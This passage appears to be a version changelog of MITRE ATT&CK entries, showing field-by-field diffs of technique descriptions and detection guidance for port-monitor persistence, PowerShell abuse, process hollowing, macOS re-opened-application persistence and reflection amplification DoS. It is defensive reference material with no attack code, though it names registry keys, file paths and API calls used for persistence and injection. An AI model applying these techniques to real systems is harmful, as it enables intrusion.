descriptionAdversaries may attempt to gather information about attached peripheral devices and components connected to a computer system. Peripheral devices could include auxiliary resources that support a variety of functionalities such as keyboards, printers, cameras, smart card readers, or removable storage. The information may be used to enhance their awareness of the system and network environment or may be used for further actions.Adversaries may attempt to gather information about attached peripheral devices and components connected to a computer system.(Citation: Peripheral Discovery Linux)(Citation: Peripheral Discovery macOS) Peripheral devices could include auxiliary resources that support a variety of functionalities such as keyboards, printers, cameras, smart card readers, or removable storage. The information may be used to enhance their awareness of the system and network environment or may be used for further actions.
x_mitre_version1.21.3
iterable_item_added
STIX FieldOld valueNew Value
external_references{'source_name': 'Peripheral Discovery Linux', 'description': 'Shahriar Shovon. (2018, March). List USB Devices Linux. Retrieved March 11, 2022.', 'url': 'https://linuxhint.com/list-usb-devices-linux/'}
external_references{'source_name': 'Peripheral Discovery macOS', 'description': 'SS64. (n.d.). system_profiler. Retrieved March 11, 2022.', 'url': 'https://ss64.com/osx/system_profiler.html'}
x_mitre_data_sourcesProcess: OS API Execution
x_mitre_platformsLinux
iterable_item_removed
STIX FieldOld valueNew Value
x_mitre_data_sourcesProcess: OS API Execution

[T1547.010] Boot or Logon Autostart Execution: Port Monitors

Current version: 1.1

Version changed from: 1.0 → 1.1


Old Description
New Description
t1Adversaries may use port monitors to run an attacker suppliet1Adversaries may use port monitors to run an adversary suppli
>d DLL during system boot for persistence or privilege escala>ed DLL during system boot for persistence or privilege escal
>tion. A port monitor can be set through the <code>AddMonitor>ation. A port monitor can be set through the <code>AddMonito
></code> API call to set a DLL to be loaded at startup. (Cita>r</code> API call to set a DLL to be loaded at startup.(Cita
>tion: AddMonitor) This DLL can be located in <code>C:\Window>tion: AddMonitor) This DLL can be located in <code>C:\Window
>s\System32</code> and will be loaded by the print spooler se>s\System32</code> and will be loaded by the print spooler se
>rvice, spoolsv.exe, on boot. The spoolsv.exe process also ru>rvice, spoolsv.exe, on boot. The spoolsv.exe process also ru
>ns under SYSTEM level permissions. (Citation: Bloxham) Alter>ns under SYSTEM level permissions.(Citation: Bloxham) Altern
>natively, an arbitrary DLL can be loaded if permissions allo>atively, an arbitrary DLL can be loaded if permissions allow
>w writing a fully-qualified pathname for that DLL to <code>H> writing a fully-qualified pathname for that DLL to <code>HK
>KLM\SYSTEM\CurrentControlSet\Control\Print\Monitors</code>. >LM\SYSTEM\CurrentControlSet\Control\Print\Monitors</code>.  
>  The Registry key contains entries for the following:  * Lo> The Registry key contains entries for the following:  * Loc
>cal Port * Standard TCP/IP Port * USB Monitor * WSD Port  Ad>al Port * Standard TCP/IP Port * USB Monitor * WSD Port  Adv
>versaries can use this technique to load malicious code at s>ersaries can use this technique to load malicious code at st
>tartup that will persist on system reboot and execute as SYS>artup that will persist on system reboot and execute as SYST
>TEM.>EM.
Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_deprecatedFalse
x_mitre_domains['enterprise-attack']
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
values_changed
STIX FieldOld valueNew Value
modified2020-01-24 19:46:27.750000+00:002022-04-20 16:36:31.835000+00:00
descriptionAdversaries may use port monitors to run an attacker supplied DLL during system boot for persistence or privilege escalation. A port monitor can be set through the AddMonitor API call to set a DLL to be loaded at startup. (Citation: AddMonitor) This DLL can be located in C:\Windows\System32 and will be loaded by the print spooler service, spoolsv.exe, on boot. The spoolsv.exe process also runs under SYSTEM level permissions. (Citation: Bloxham) Alternatively, an arbitrary DLL can be loaded if permissions allow writing a fully-qualified pathname for that DLL to HKLM\SYSTEM\CurrentControlSet\Control\Print\Monitors. The Registry key contains entries for the following: * Local Port * Standard TCP/IP Port * USB Monitor * WSD Port Adversaries can use this technique to load malicious code at startup that will persist on system reboot and execute as SYSTEM.Adversaries may use port monitors to run an adversary supplied DLL during system boot for persistence or privilege escalation. A port monitor can be set through the AddMonitor API call to set a DLL to be loaded at startup.(Citation: AddMonitor) This DLL can be located in C:\Windows\System32 and will be loaded by the print spooler service, spoolsv.exe, on boot. The spoolsv.exe process also runs under SYSTEM level permissions.(Citation: Bloxham) Alternatively, an arbitrary DLL can be loaded if permissions allow writing a fully-qualified pathname for that DLL to HKLM\SYSTEM\CurrentControlSet\Control\Print\Monitors. The Registry key contains entries for the following: * Local Port * Standard TCP/IP Port * USB Monitor * WSD Port Adversaries can use this technique to load malicious code at startup that will persist on system reboot and execute as SYSTEM.
external_references[1]['source_name']AddMonitorBloxham
external_references[1]['description']Microsoft. (n.d.). AddMonitor function. Retrieved November 12, 2014.Bloxham, B. (n.d.). Getting Windows to Play with Itself [PowerPoint slides]. Retrieved November 12, 2014.
external_references[1]['url']http://msdn.microsoft.com/en-us/library/dd183341https://www.defcon.org/images/defcon-22/dc-22-presentations/Bloxham/DEFCON-22-Brady-Bloxham-Windows-API-Abuse-UPDATED.pdf
external_references[2]['source_name']BloxhamAddMonitor
external_references[2]['description']Bloxham, B. (n.d.). Getting Windows to Play with Itself [PowerPoint slides]. Retrieved November 12, 2014.Microsoft. (n.d.). AddMonitor function. Retrieved November 12, 2014.
external_references[2]['url']https://www.defcon.org/images/defcon-22/dc-22-presentations/Bloxham/DEFCON-22-Brady-Bloxham-Windows-API-Abuse-UPDATED.pdfhttp://msdn.microsoft.com/en-us/library/dd183341
x_mitre_data_sources[0]File: File CreationWindows Registry: Windows Registry Key Modification
x_mitre_data_sources[1]Process: OS API ExecutionModule: Module Load
x_mitre_data_sources[2]Module: Module LoadProcess: OS API Execution
x_mitre_data_sources[3]Windows Registry: Windows Registry Key ModificationFile: File Creation
x_mitre_detectionMonitor process API calls to AddMonitor.(Citation: AddMonitor) Monitor DLLs that are loaded by spoolsv.exe for DLLs that are abnormal. New DLLs written to the System32 directory that do not correlate with known good software or patching may be suspicious. Monitor Registry writes to HKLM\SYSTEM\CurrentControlSet\Control\Print\Monitors. Run the Autoruns utility, which checks for this Registry key as a persistence mechanism (Citation: TechNet Autoruns)Monitor process API calls to AddMonitor.(Citation: AddMonitor) Monitor DLLs that are loaded by spoolsv.exe for DLLs that are abnormal. New DLLs written to the System32 directory that do not correlate with known good software or patching may be suspicious. Monitor Registry writes to HKLM\SYSTEM\CurrentControlSet\Control\Print\Monitors. Run the Autoruns utility, which checks for this Registry key as a persistence mechanism.(Citation: TechNet Autoruns)
x_mitre_version1.01.1

[T1059.001] Command and Scripting Interpreter: PowerShell

Current version: 1.2

Version changed from: 1.1 → 1.2


Old Description
New Description
t1Adversaries may abuse PowerShell commands and scripts for ext1Adversaries may abuse PowerShell commands and scripts for ex
>ecution. PowerShell is a powerful interactive command-line i>ecution. PowerShell is a powerful interactive command-line i
>nterface and scripting environment included in the Windows o>nterface and scripting environment included in the Windows o
>perating system. (Citation: TechNet PowerShell) Adversaries >perating system.(Citation: TechNet PowerShell) Adversaries c
>can use PowerShell to perform a number of actions, including>an use PowerShell to perform a number of actions, including 
> discovery of information and execution of code. Examples in>discovery of information and execution of code. Examples inc
>clude the <code>Start-Process</code> cmdlet which can be use>lude the <code>Start-Process</code> cmdlet which can be used
>d to run an executable and the <code>Invoke-Command</code> c> to run an executable and the <code>Invoke-Command</code> cm
>mdlet which runs a command locally or on a remote computer (>dlet which runs a command locally or on a remote computer (t
>though administrator permissions are required to use PowerSh>hough administrator permissions are required to use PowerShe
>ell to connect to remote systems).  PowerShell may also be u>ll to connect to remote systems).  PowerShell may also be us
>sed to download and run executables from the Internet, which>ed to download and run executables from the Internet, which 
> can be executed from disk or in memory without touching dis>can be executed from disk or in memory without touching disk
>k.  A number of PowerShell-based offensive testing tools are>.  A number of PowerShell-based offensive testing tools are 
> available, including [Empire](https://attack.mitre.org/soft>available, including [Empire](https://attack.mitre.org/softw
>ware/S0363),  [PowerSploit](https://attack.mitre.org/softwar>are/S0363),  [PowerSploit](https://attack.mitre.org/software
>e/S0194), [PoshC2](https://attack.mitre.org/software/S0378),>/S0194), [PoshC2](https://attack.mitre.org/software/S0378), 
> and PSAttack.(Citation: Github PSAttack)  PowerShell comman>and PSAttack.(Citation: Github PSAttack)  PowerShell command
>ds/scripts can also be executed without directly invoking th>s/scripts can also be executed without directly invoking the
>e <code>powershell.exe</code> binary through interfaces to P> <code>powershell.exe</code> binary through interfaces to Po
>owerShell's underlying <code>System.Management.Automation</c>werShell's underlying <code>System.Management.Automation</co
>ode> assembly DLL exposed through the .NET framework and Win>de> assembly DLL exposed through the .NET framework and Wind
>dows Common Language Interface (CLI). (Citation: Sixdub Powe>ows Common Language Interface (CLI).(Citation: Sixdub PowerP
>rPick Jan 2016)(Citation: SilentBreak Offensive PS Dec 2015)>ick Jan 2016)(Citation: SilentBreak Offensive PS Dec 2015)(C
>(Citation: Microsoft PSfromCsharp APR 2014)>itation: Microsoft PSfromCsharp APR 2014)

New Detections:

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_deprecatedFalse
x_mitre_domains['enterprise-attack']
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
dictionary_item_removed
STIX FieldOld valueNew Value
x_mitre_permissions_required['User', 'Administrator']
values_changed
STIX FieldOld valueNew Value
modified2021-05-28 14:56:23.748000+00:002022-04-19 20:25:48.646000+00:00
descriptionAdversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system. (Citation: TechNet PowerShell) Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the Start-Process cmdlet which can be used to run an executable and the Invoke-Command cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems). PowerShell may also be used to download and run executables from the Internet, which can be executed from disk or in memory without touching disk. A number of PowerShell-based offensive testing tools are available, including [Empire](https://attack.mitre.org/software/S0363), [PowerSploit](https://attack.mitre.org/software/S0194), [PoshC2](https://attack.mitre.org/software/S0378), and PSAttack.(Citation: Github PSAttack) PowerShell commands/scripts can also be executed without directly invoking the powershell.exe binary through interfaces to PowerShell's underlying System.Management.Automation assembly DLL exposed through the .NET framework and Windows Common Language Interface (CLI). (Citation: Sixdub PowerPick Jan 2016)(Citation: SilentBreak Offensive PS Dec 2015)(Citation: Microsoft PSfromCsharp APR 2014)Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system.(Citation: TechNet PowerShell) Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the Start-Process cmdlet which can be used to run an executable and the Invoke-Command cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems). PowerShell may also be used to download and run executables from the Internet, which can be executed from disk or in memory without touching disk. A number of PowerShell-based offensive testing tools are available, including [Empire](https://attack.mitre.org/software/S0363), [PowerSploit](https://attack.mitre.org/software/S0194), [PoshC2](https://attack.mitre.org/software/S0378), and PSAttack.(Citation: Github PSAttack) PowerShell commands/scripts can also be executed without directly invoking the powershell.exe binary through interfaces to PowerShell's underlying System.Management.Automation assembly DLL exposed through the .NET framework and Windows Common Language Interface (CLI).(Citation: Sixdub PowerPick Jan 2016)(Citation: SilentBreak Offensive PS Dec 2015)(Citation: Microsoft PSfromCsharp APR 2014)
external_references[1]['source_name']TechNet PowerShellMicrosoft PSfromCsharp APR 2014
external_references[1]['description']Microsoft. (n.d.). Windows PowerShell Scripting. Retrieved April 28, 2016.Babinec, K. (2014, April 28). Executing PowerShell scripts from C#. Retrieved April 22, 2019.
external_references[1]['url']https://technet.microsoft.com/en-us/scriptcenter/dd742419.aspxhttps://blogs.msdn.microsoft.com/kebab/2014/04/28/executing-powershell-scripts-from-c/
external_references[2]['source_name']Github PSAttackSilentBreak Offensive PS Dec 2015
external_references[2]['description']Haight, J. (2016, April 21). PS>Attack. Retrieved June 1, 2016.Christensen, L.. (2015, December 28). The Evolution of Offensive PowerShell Invocation. Retrieved December 8, 2018.
external_references[2]['url']https://github.com/jaredhaight/PSAttackhttps://silentbreaksecurity.com/powershell-jobs-without-powershell-exe/
external_references[3]['source_name']Sixdub PowerPick Jan 2016FireEye PowerShell Logging 2016
external_references[3]['description']Warner, J.. (2015, January 6). Inexorable PowerShell – A Red Teamer’s Tale of Overcoming Simple AppLocker Policies. Retrieved December 8, 2018.Dunwoody, M. (2016, February 11). GREATER VISIBILITY THROUGH POWERSHELL LOGGING. Retrieved February 16, 2016.
external_references[3]['url']http://www.sixdub.net/?p=367https://www.fireeye.com/blog/threat-research/2016/02/greater_visibilityt.html
external_references[4]['source_name']SilentBreak Offensive PS Dec 2015Github PSAttack
external_references[4]['description']Christensen, L.. (2015, December 28). The Evolution of Offensive PowerShell Invocation. Retrieved December 8, 2018.Haight, J. (2016, April 21). PS>Attack. Retrieved June 1, 2016.
external_references[4]['url']https://silentbreaksecurity.com/powershell-jobs-without-powershell-exe/https://github.com/jaredhaight/PSAttack
external_references[5]['source_name']Microsoft PSfromCsharp APR 2014inv_ps_attacks
external_references[5]['description']Babinec, K. (2014, April 28). Executing PowerShell scripts from C#. Retrieved April 22, 2019.Hastings, M. (2014, July 16). Investigating PowerShell Attacks. Retrieved December 1, 2021.
external_references[5]['url']https://blogs.msdn.microsoft.com/kebab/2014/04/28/executing-powershell-scripts-from-c/https://powershellmagazine.com/2014/07/16/investigating-powershell-attacks/
external_references[7]['source_name']FireEye PowerShell Logging 2016TechNet PowerShell
external_references[7]['description']Dunwoody, M. (2016, February 11). GREATER VISIBILITY THROUGH POWERSHELL LOGGING. Retrieved February 16, 2016.Microsoft. (n.d.). Windows PowerShell Scripting. Retrieved April 28, 2016.
external_references[7]['url']https://www.fireeye.com/blog/threat-research/2016/02/greater_visibilityt.htmlhttps://technet.microsoft.com/en-us/scriptcenter/dd742419.aspx
x_mitre_data_sources[0]Command: Command ExecutionModule: Module Load
x_mitre_data_sources[1]Module: Module LoadProcess: Process Metadata
x_mitre_detectionIf proper execution policy is set, adversaries will likely be able to define their own execution policy if they obtain administrator or system access, either through the Registry or at the command line. This change in policy on a system may be a way to detect malicious use of PowerShell. If PowerShell is not used in an environment, then simply looking for PowerShell execution may detect malicious activity. Monitor for loading and/or execution of artifacts associated with PowerShell specific assemblies, such as System.Management.Automation.dll (especially to unusual process names/locations).(Citation: Sixdub PowerPick Jan 2016)(Citation: SilentBreak Offensive PS Dec 2015) It is also beneficial to turn on PowerShell logging to gain increased fidelity in what occurs during execution (which is applied to .NET invocations). (Citation: Malware Archaeology PowerShell Cheat Sheet) PowerShell 5.0 introduced enhanced logging capabilities, and some of those features have since been added to PowerShell 4.0. Earlier versions of PowerShell do not have many logging features.(Citation: FireEye PowerShell Logging 2016) An organization can gather PowerShell execution details in a data analytic platform to supplement it with other data.If proper execution policy is set, adversaries will likely be able to define their own execution policy if they obtain administrator or system access, either through the Registry or at the command line. This change in policy on a system may be a way to detect malicious use of PowerShell. If PowerShell is not used in an environment, then simply looking for PowerShell execution may detect malicious activity. Monitor for loading and/or execution of artifacts associated with PowerShell specific assemblies, such as System.Management.Automation.dll (especially to unusual process names/locations).(Citation: Sixdub PowerPick Jan 2016)(Citation: SilentBreak Offensive PS Dec 2015) It is also beneficial to turn on PowerShell logging to gain increased fidelity in what occurs during execution (which is applied to .NET invocations). (Citation: Malware Archaeology PowerShell Cheat Sheet) PowerShell 5.0 introduced enhanced logging capabilities, and some of those features have since been added to PowerShell 4.0. Earlier versions of PowerShell do not have many logging features.(Citation: FireEye PowerShell Logging 2016) An organization can gather PowerShell execution details in a data analytic platform to supplement it with other data. Consider monitoring for Windows event ID (EID) 400, which shows the version of PowerShell executing in the EngineVersion field (which may also be relevant to detecting a potential [Downgrade Attack](https://attack.mitre.org/techniques/T1562/010)) as well as if PowerShell is running locally or remotely in the HostName field. Furthermore, EID 400 may indicate the start time and EID 403 indicates the end time of a PowerShell session.(Citation: inv_ps_attacks)
x_mitre_version1.11.2
iterable_item_added
STIX FieldOld valueNew Value
external_references{'source_name': 'Sixdub PowerPick Jan 2016', 'description': 'Warner, J.. (2015, January 6). Inexorable PowerShell – A Red Teamer’s Tale of Overcoming Simple AppLocker Policies. Retrieved December 8, 2018.', 'url': 'http://www.sixdub.net/?p=367'}
x_mitre_contributorsMayuresh Dani, Qualys
x_mitre_data_sourcesCommand: Command Execution

[T1546.013] Event Triggered Execution: PowerShell Profile

Current version: 1.1

Version changed from: 1.0 → 1.1

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_domains['enterprise-attack']
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
values_changed
STIX FieldOld valueNew Value
modified2020-03-24 21:31:31.082000+00:002022-02-08 16:39:08.851000+00:00
x_mitre_data_sources[2]Command: Command ExecutionFile: File Creation
x_mitre_detectionLocations where profile.ps1 can be stored should be monitored for new profiles or modifications. (Citation: Malware Archaeology PowerShell Cheat Sheet) Example profile locations include: * $PsHome\Profile.ps1 * $PsHome\Microsoft.{HostProgram}_profile.ps1 * $Home\My Documents\PowerShell\Profile.ps1 * $Home\My Documents\PowerShell\Microsoft.{HostProgram}_profile.ps1 Monitor abnormal PowerShell commands, unusual loading of PowerShell drives or modules, and/or execution of unknown programs.Locations where profile.ps1 can be stored should be monitored for new profiles or modifications. (Citation: Malware Archaeology PowerShell Cheat Sheet)(Citation: Microsoft Profiles) Example profile locations (user defaults as well as program-specific) include: * $PsHome\Profile.ps1 * $PsHome\Microsoft.{HostProgram}_profile.ps1 * $Home\\\[My ]Documents\PowerShell\Profile.ps1 * $Home\\\[My ]Documents\PowerShell\Microsoft.{HostProgram}_profile.ps1 Monitor abnormal PowerShell commands, unusual loading of PowerShell drives or modules, and/or execution of unknown programs.
x_mitre_version1.01.1
iterable_item_added
STIX FieldOld valueNew Value
external_references{'source_name': 'Microsoft Profiles', 'description': 'Microsoft. (2021, September 27). about_Profiles. Retrieved February 4, 2022.', 'url': 'https://docs.microsoft.com/powershell/module/microsoft.powershell.core/about/about_profiles'}
x_mitre_contributorsMatthew Green
x_mitre_data_sourcesCommand: Command Execution
iterable_item_removed
STIX FieldOld valueNew Value
x_mitre_data_sourcesFile: File Creation

[T1055.012] Process Injection: Process Hollowing

Current version: 1.2

Version changed from: 1.1 → 1.2

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_domains['enterprise-attack']
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
values_changed
STIX FieldOld valueNew Value
modified2021-10-18 12:30:14.640000+00:002021-11-29 17:22:32.704000+00:00
x_mitre_data_sources[0]Process: Process ModificationProcess: OS API Execution
x_mitre_data_sources[1]Process: OS API ExecutionProcess: Process Modification
x_mitre_detectionMonitoring Windows API calls indicative of the various types of code injection may generate a significant amount of data and may not be directly useful for defense unless collected under specific circumstances for known bad sequences of calls, since benign use of API functions may be common and difficult to distinguish from malicious behavior. Windows API calls such as CreateRemoteThread, SuspendThread/SetThreadContext/ResumeThread, and those that can be used to modify memory within another process, such as VirtualAllocEx/WriteProcessMemory, may be used for this technique.(Citation: Elastic Process Injection July 2017) Analyze process behavior to determine if a process is performing actions it usually does not, such as opening network connections, reading files, or other suspicious actions that could relate to post-compromise behavior. Monitoring Windows API calls indicative of the various types of code injection may generate a significant amount of data and may not be directly useful for defense unless collected under specific circumstances for known bad sequences of calls, since benign use of API functions may be common and difficult to distinguish from malicious behavior. Windows API calls such as CreateRemoteThread, SuspendThread/SetThreadContext/ResumeThread, and those that can be used to modify memory within another process, such as VirtualAllocEx/WriteProcessMemory, may be used for this technique.(Citation: Elastic Process Injection July 2017) Processing hollowing commonly involves spawning an otherwise benign victim process. Consider correlating detections of processes created in a suspended state (ex: through API flags or process’ thread metadata) with other malicious activity such as attempts to modify a process' memory, especially by its parent process, or other abnormal process behavior.(Citation: Nviso Spoof Command Line 2020)(Citation: Mandiant Endpoint Evading 2019) Analyze process behavior to determine if a process is performing actions it usually does not, such as opening network connections, reading files, or other suspicious actions that could relate to post-compromise behavior.
x_mitre_version1.11.2
iterable_item_added
STIX FieldOld valueNew Value
external_references{'source_name': 'Nviso Spoof Command Line 2020', 'description': 'Daman, R. (2020, February 4). The return of the spoof part 2: Command line spoofing. Retrieved November 19, 2021.', 'url': 'https://blog.nviso.eu/2020/02/04/the-return-of-the-spoof-part-2-command-line-spoofing/'}
external_references{'source_name': 'Mandiant Endpoint Evading 2019', 'description': 'Pena, E., Erikson, C. (2019, October 10). Staying Hidden on the Endpoint: Evading Detection with Shellcode. Retrieved November 29, 2021.', 'url': 'https://www.mandiant.com/resources/staying-hidden-on-the-endpoint-evading-detection-with-shellcode'}

[T1055] Process Injection

Current version: 1.3

Version changed from: 1.2 → 1.3

New Detections:

Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_deprecatedFalse
x_mitre_domains['enterprise-attack']
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
external_referencesGNU. (2010, February 5). The GNU Accounting Utilities. Retrieved December 20, 2017.
external_referenceshttps://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/6/html/security_guide/chap-system_auditing
external_referencesCAPEC-640
dictionary_item_removed
STIX FieldOld valueNew Value
external_referencesCAPEC-640
external_referenceshttps://www.gnu.org/software/acct/
external_referencesRussinovich, M. & Garnier, T. (2017, May 22). Sysmon v6.20. Retrieved December 13, 2017.
values_changed
STIX FieldOld valueNew Value
modified2021-10-18 12:30:14.852000+00:002022-10-18 20:58:50.105000+00:00
external_references[1]['source_name']capecGNU Acct
external_references[1]['url']https://capec.mitre.org/data/definitions/640.htmlhttps://www.gnu.org/software/acct/
external_references[3]['source_name']ArtOfMemoryForensicsRHEL auditd
external_references[3]['description']Ligh, M.H. et al.. (2014, July). The Art of Memory Forensics: Detecting Malware and Threats in Windows, Linux, and Mac Memory. Retrieved December 20, 2017.Jahoda, M. et al.. (2017, March 14). redhat Security Guide - Chapter 7 - System Auditing. Retrieved December 20, 2017.
external_references[4]['source_name']GNU AcctArtOfMemoryForensics
external_references[4]['description']GNU. (2010, February 5). The GNU Accounting Utilities. Retrieved December 20, 2017.Ligh, M.H. et al.. (2014, July). The Art of Memory Forensics: Detecting Malware and Threats in Windows, Linux, and Mac Memory. Retrieved December 20, 2017.
external_references[5]['source_name']RHEL auditdMicrosoft Sysmon v6 May 2017
external_references[5]['description']Jahoda, M. et al.. (2017, March 14). redhat Security Guide - Chapter 7 - System Auditing. Retrieved December 20, 2017.Russinovich, M. & Garnier, T. (2017, May 22). Sysmon v6.20. Retrieved December 13, 2017.
external_references[5]['url']https://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/6/html/security_guide/chap-system_auditinghttps://docs.microsoft.com/sysinternals/downloads/sysmon
external_references[7]['source_name']Microsoft Sysmon v6 May 2017capec
external_references[7]['url']https://docs.microsoft.com/sysinternals/downloads/sysmonhttps://capec.mitre.org/data/definitions/640.html
x_mitre_data_sources[0]Process: Process ModificationProcess: Process Access
x_mitre_data_sources[1]Module: Module LoadProcess: OS API Execution
x_mitre_data_sources[2]Process: OS API ExecutionProcess: Process Metadata
x_mitre_data_sources[3]Process: Process AccessModule: Module Load
x_mitre_data_sources[4]File: File ModificationFile: File Metadata
x_mitre_data_sources[5]File: File MetadataProcess: Process Modification
x_mitre_version1.21.3
iterable_item_added
STIX FieldOld valueNew Value
x_mitre_data_sourcesFile: File Modification

[T1547.007] Boot or Logon Autostart Execution: Re-opened Applications

Current version: 1.1

Version changed from: 1.0 → 1.1


Old Description
New Description
t1Adversaries may modify plist files to automatically run an at1Adversaries may modify plist files to automatically run an a
>pplication when a user logs in. Starting in Mac OS X 10.7 (L>pplication when a user logs in. When a user logs out or rest
>ion), users can specify certain applications to be re-opened>arts via the macOS Graphical User Interface (GUI), a prompt 
> when a user logs into their machine after reboot. While thi>is provided to the user with a checkbox to "Reopen windows w
>s is usually done via a Graphical User Interface (GUI) on an>hen logging back in".(Citation: Re-Open windows on Mac) When
> app-by-app basis, there are property list files (plist) tha> selected, all applications currently open are added to a pr
>t contain this information as well located at <code>~/Librar>operty list file named <code>com.apple.loginwindow.[UUID].pl
>y/Preferences/com.apple.loginwindow.plist</code> and <code>~>ist</code> within the <code>~/Library/Preferences/ByHost</co
>/Library/Preferences/ByHost/com.apple.loginwindow.* .plist</>de> directory.(Citation: Methods of Mac Malware Persistence)
>code>.   An adversary can modify one of these files directly>(Citation: Wardle Persistence Chapter) Applications listed i
> to include a link to their malicious executable to provide >n this file are automatically reopened upon the user’s next 
>a persistence mechanism each time the user reboots their mac>logon.  Adversaries can establish [Persistence](https://atta
>hine (Citation: Methods of Mac Malware Persistence).>ck.mitre.org/tactics/TA0003) by adding a malicious applicati
 >on path to the <code>com.apple.loginwindow.[UUID].plist</cod
 >e> file to execute payloads when a user logs in.
Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version2.1.0
x_mitre_deprecatedFalse
x_mitre_domains['enterprise-attack']
x_mitre_modified_by_refidentity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
values_changed
STIX FieldOld valueNew Value
modified2020-01-24 19:51:37.795000+00:002022-04-19 23:46:56.443000+00:00
descriptionAdversaries may modify plist files to automatically run an application when a user logs in. Starting in Mac OS X 10.7 (Lion), users can specify certain applications to be re-opened when a user logs into their machine after reboot. While this is usually done via a Graphical User Interface (GUI) on an app-by-app basis, there are property list files (plist) that contain this information as well located at ~/Library/Preferences/com.apple.loginwindow.plist and ~/Library/Preferences/ByHost/com.apple.loginwindow.* .plist. An adversary can modify one of these files directly to include a link to their malicious executable to provide a persistence mechanism each time the user reboots their machine (Citation: Methods of Mac Malware Persistence).Adversaries may modify plist files to automatically run an application when a user logs in. When a user logs out or restarts via the macOS Graphical User Interface (GUI), a prompt is provided to the user with a checkbox to "Reopen windows when logging back in".(Citation: Re-Open windows on Mac) When selected, all applications currently open are added to a property list file named com.apple.loginwindow.[UUID].plist within the ~/Library/Preferences/ByHost directory.(Citation: Methods of Mac Malware Persistence)(Citation: Wardle Persistence Chapter) Applications listed in this file are automatically reopened upon the user’s next logon. Adversaries can establish [Persistence](https://attack.mitre.org/tactics/TA0003) by adding a malicious application path to the com.apple.loginwindow.[UUID].plist file to execute payloads when a user logs in.
external_references[1]['source_name']Methods of Mac Malware PersistenceRe-Open windows on Mac
external_references[1]['description']Patrick Wardle. (2014, September). Methods of Malware Persistence on Mac OS X. Retrieved July 5, 2017.Apple. (2016, December 6). Automatically re-open windows, apps, and documents on your Mac. Retrieved July 11, 2017.
external_references[1]['url']https://www.virusbulletin.com/uploads/pdf/conference/vb2014/VB2014-Wardle.pdfhttps://support.apple.com/en-us/HT204005
x_mitre_data_sources[0]File: File ModificationCommand: Command Execution
x_mitre_data_sources[1]Command: Command ExecutionFile: File Modification
x_mitre_version1.01.1
iterable_item_added
STIX FieldOld valueNew Value
external_references{'source_name': 'Methods of Mac Malware Persistence', 'description': 'Patrick Wardle. (2014, September). Methods of Malware Persistence on Mac OS X. Retrieved July 5, 2017.', 'url': 'https://www.virusbulletin.com/uploads/pdf/conference/vb2014/VB2014-Wardle.pdf'}
external_references{'source_name': 'Wardle Persistence Chapter', 'description': 'Patrick Wardle. (n.d.). Chapter 0x2: Persistence. Retrieved April 13, 2022.', 'url': 'https://taomm.org/PDFs/vol1/CH%200x02%20Persistence.pdf'}

[T1498.002] Network Denial of Service: Reflection Amplification

Current version: 1.3

Version changed from: 1.2 → 1.3


Old Description
New Description
t1Adversaries may attempt to cause a denial of service by reflt1Adversaries may attempt to cause a denial of service (DoS) b
>ecting a high-volume of network traffic to a target. This ty>y reflecting a high-volume of network traffic to a target. T
>pe of Network DoS takes advantage of a third-party server in>his type of Network DoS takes advantage of a third-party ser
>termediary that hosts and will respond to a given spoofed so>ver intermediary that hosts and will respond to a given spoo
>urce IP address. This third-party server is commonly termed >fed source IP address. This third-party server is commonly t
>a reflector. An adversary accomplishes a reflection attack b>ermed a reflector. An adversary accomplishes a reflection at
>y sending packets to reflectors with the spoofed address of >tack by sending packets to reflectors with the spoofed addre
>the victim. Similar to Direct Network Floods, more than one >ss of the victim. Similar to Direct Network Floods, more tha
>system may be used to conduct the attack, or a botnet may be>n one system may be used to conduct the attack, or a botnet 
> used. Likewise, one or more reflector may be used to focus >may be used. Likewise, one or more reflectors may be used to
>traffic on the target.(Citation: Cloudflare ReflectionDoS Ma> focus traffic on the target.(Citation: Cloudflare Reflectio
>y 2017)  Reflection attacks often take advantage of protocol>nDoS May 2017) This Network DoS attack may also reduce the a
>with larger responses than requests in order to amplify th>vailability and functionality of the targeted system(s) and 
>eir traffic, commonly known as a Reflection Amplification at>network.  Reflection attacks often take advantage of protoco
>tack. Adversaries may be able to generate an increase in vol>ls with larger responses than requests in order to amplify t
>ume of attack traffic that is several orders of magnitude gr>heir traffic, commonly known as a Reflection Amplification a
>eater than the requests sent to the amplifiers. The extent o>ttack. Adversaries may be able to generate an increase in vo
>f this increase will depending upon many variables, such as >lume of attack traffic that is several orders of magnitude g
>the protocol in question, the technique used, and the amplif>reater than the requests sent to the amplifiers. The extent 
>ying servers that actually produce the amplification in atta>of this increase will depending upon many variables, such as
>ck volume. Two prominent protocols that have enabled Reflect> the protocol in question, the technique used, and the ampli
>ion Amplification Floods are DNS(Citation: Cloudflare DNSamp>fying servers that actually produce the amplification in att
>lficationDoS) and NTP(Citation: Cloudflare NTPamplifciationD>ack volume. Two prominent protocols that have enabled Reflec
>oS), though the use of several others in the wild have been >tion Amplification Floods are DNS(Citation: Cloudflare DNSam
>documented.(Citation: Arbor AnnualDoSreport Jan 2018)  In pa>plficationDoS) and NTP(Citation: Cloudflare NTPamplifciation
